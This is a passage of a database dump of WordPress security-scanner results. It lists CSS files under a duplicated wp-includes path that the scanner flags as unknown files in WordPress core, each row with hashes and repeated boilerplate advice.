file in WordPress core: wp-includes/wp-includes/css/dist/editor/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/editor/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26863,1631424879,1631424879,'new','knownfile',75,'55873620d67e190d1c9adcd21c07af75','e0ab156e9e46ff71903fac0f74b5edb6','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/editor/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26864,1631424879,1631424879,'new','knownfile',75,'186a67a6b6496b34af6bf60b81e27ed9','70d39054fe5b25448a0d9275bab4faed','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/dist/editor/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26865,1631424879,1631424879,'new','knownfile',75,'7593ce491704d2934ae82ff09d14384f','c632c50e645c7f3f7486d65179795113','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/editor/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26866,1631424879,1631424879,'new','knownfile',75,'779a3f303387a04c3eaeddce2b0756c5','c5d3a26785c8e46dde5b1bcf7349f8f4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/format-library/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26867,1631424879,1631424879,'new','knownfile',75,'b51b772cf7cc273d2be29f1f40ece5d8','c57ddee0ee2d846c78ff37571fe577f4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26868,1631424879,1631424879,'new','knownfile',75,'26d6a80591bafa5ddb59cbf90390bc4f','0edd21f624e5e6ad657857cedbf46387','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/format-library/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26869,1631424879,1631424879,'new','knownfile',75,'8eeffa5038180d505ef25042bfe04717','fc0a9f126ba997b6ef9d1fdfad9fbf4a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/format-library/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26870,1631424879,1631424879,'new','knownfile',75,'bf3ebc270cfd0200471c9645a2c09011','88b54d5cbeb737fcfc469e268f760b9d','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26871,1631424879,1631424879,'new','knownfile',75,'59d35f6fea1d95e926099b4c0497c6d6','4037f6a08c4b8409c28d3a9b49cf6dc4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26872,1631424879,1631424879,'new','knownfile',75,'bfb5176d7cabad2cb638324d923d6f38','e519a06c916cca9cca101e99efa0465a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26873,1631424880,1631424880,'new','knownfile',75,'092e7139564694d7e9219e4e4ca8821e','1b2269bda2aa333c5d1d918232bf7c1f','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26874,1631424880,1631424880,'new','knownfile',75,'df538fcba5354b4ae77cdfc0f12a4d06','d74c907d99fa2a9a4696cec7b15a19ff','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/dist/nux/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26875,1631424880,1631424880,'new','knownfile',75,'e3325e0490d8648794a0262e20f85396','b5fd656507cbd6ed7213ee6c207a2d89','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/css/dist/nux/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26876,1631424880,1631424880,'new','knownfile',75,'7950ff61dd831ffce5a38cfc0ab4d05f','d8f78cad995582e8229b7a352e8d93c0','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/dist/nux/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26877,1631424880,1631424880,'new','knownfile',75,'f2fd4fb420f885c1505034bed755ecc2','db72b4c749e6a2b6db8a3d7ce8da5a24','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/dist/nux/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26878,1631424880,1631424880,'new','knownfile',75,'a48b1637b75e288646610deca452cab0','600ce8b1ddfaecdf9d8520b17518652c','Unknown file in WordPress core: wp-includes/wp-includes/css/editor-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/editor-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26879,1631424880,1631424880,'new','knownfile',75,'8ad11f7640c69f885cf2bf352c80884a','170917219f56ea80bbec3a260af2d0bc','Unknown file in WordPress core: wp-includes/wp-includes/css/editor-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/editor-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26880,1631424880,1631424880,'new','knownfile',75,'c4ffba0e56d6d86ab3c8f498134e81ef','2bb372a8cc1df38792abade6cfa7aea2','Unknown file in WordPress core: wp-includes/wp-includes/css/editor.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/css/editor.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26881,1631424881,1631424881,'new','knownfile',75,'5e85f1aaf55961a028127c052faa7e6a','9a665e4b65e86bb87377c31bcdd44de3','Unknown file in WordPress core: wp-includes/wp-includes/css/editor.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/editor.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26882,1631424881,1631424881,'new','knownfile',75,'9353242e6e9054ecfb903d32ed3ce6ea','2410b5b6757e18ff1d0b65e00fa2ecc9','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26883,1631424881,1631424881,'new','knownfile',75,'59c2a41b716444b66b275e17b26615e3','515ee037941738562a8a6a7d43477c40','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26884,1631424881,1631424881,'new','knownfile',75,'f7187fca3d1a9ef150ffd79f16cfa919','35c88ea9ca93ca02a7605b3200971b02','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/css/jquery-ui-dialog.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26885,1631424881,1631424881,'new','knownfile',75,'082c0444f3bf02c697ba9dde86d6482b','feba99d2a0739fc2726284725ad8cc02','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/jquery-ui-dialog.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26886,1631424881,1631424881,'new','knownfile',75,'da555cfbd79026720ec3a94ffb307574','c68c27f236835c4d8fb269042e34a510','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/media-views-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26887,1631424881,1631424881,'new','knownfile',75,'23b98203bad9406ff34ee80a0797ab9c','ab2289198cfd394ab388519fc4627f78','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/css/media-views-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26888,1631424881,1631424881,'new','knownfile',75,'c2a46a16fbecf04dfa30132dbb995ab7','9c612d9b11ef14e9780555accb2639c4','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/media-views.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26889,1631424881,1631424881,'new','knownfile',75,'4fd31a2d6726d0ebb57ccaac2ce5093d','79b364ef4c7b8277b45b245e1b8e1a35','Unknown file in WordPress core: wp-includes/wp-includes/css/media-views.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/media-views.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26890,1631424881,1631424881,'new','knownfile',75,'9b56defa82dd1a0612202d500fb781d8','1b82ca4491a5a89270da550ed695dbc2','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-auth-check-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26891,1631424881,1631424881,'new','knownfile',75,'2c8649e68c28f59378e809d787caaafd','d2d685bf9a8cc5de3337330d2bba156a','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/wp-auth-check-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26892,1631424881,1631424881,'new','knownfile',75,'ec4ac91840f41d7da23f95d9fb03f536','31e1c538bd22b276377925f880e775ac','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/wp-auth-check.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26893,1631424881,1631424881,'new','knownfile',75,'ae911e169f4901d2b96280555dc27931','19a10223d581607328008aac0d85cafb','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-auth-check.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-auth-check.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26894,1631424881,1631424881,'new','knownfile',75,'f83970a07f6149653fe75e9cd8144ed3','db3577868892545ca1332cef9cd1955e','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template-ie.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/wp-embed-template-ie.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26895,1631424882,1631424882,'new','knownfile',75,'d62494a3ecc5dc1797c103af7d21eb7e','e6d683438ca25b8a1be923487c188aec','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template-ie.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/wp-embed-template-ie.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26896,1631424882,1631424882,'new','knownfile',75,'e0c3a90083266e668997940e9e4a951c','39d8afcb947f1718b5dadc1a5bcef679','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/wp-embed-template.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26897,1631424882,1631424882,'new','knownfile',75,'c946c101f926ed9926b375a90923b8fa','a24c90b335bf72d630d72b84b3b2fd75','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-embed-template.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/wp-embed-template.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26898,1631424882,1631424882,'new','knownfile',75,'f7486c2245c954608559a25b4ad44a40','a3948af57241c7073466ffc0f7f88da1','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/wp-pointer-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26899,1631424882,1631424882,'new','knownfile',75,'9ec062f7a8d2cd16103e04d94438a414','d1193707ae29aef7e7f3cd8618d146da','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/wp-pointer-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26900,1631424882,1631424882,'new','knownfile',75,'1f9d67a489fb3973bd6f946577fdd9ab','3e591ec3cb6771ca19cab5cbc883acb3','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/wp-pointer.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26901,1631424882,1631424882,'new','knownfile',75,'70a7cd994c416cf40ed863ec96db1d46','e3b055c37659793914880dd67719ed51','Unknown file in WordPress core: wp-includes/wp-includes/css/wp-pointer.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 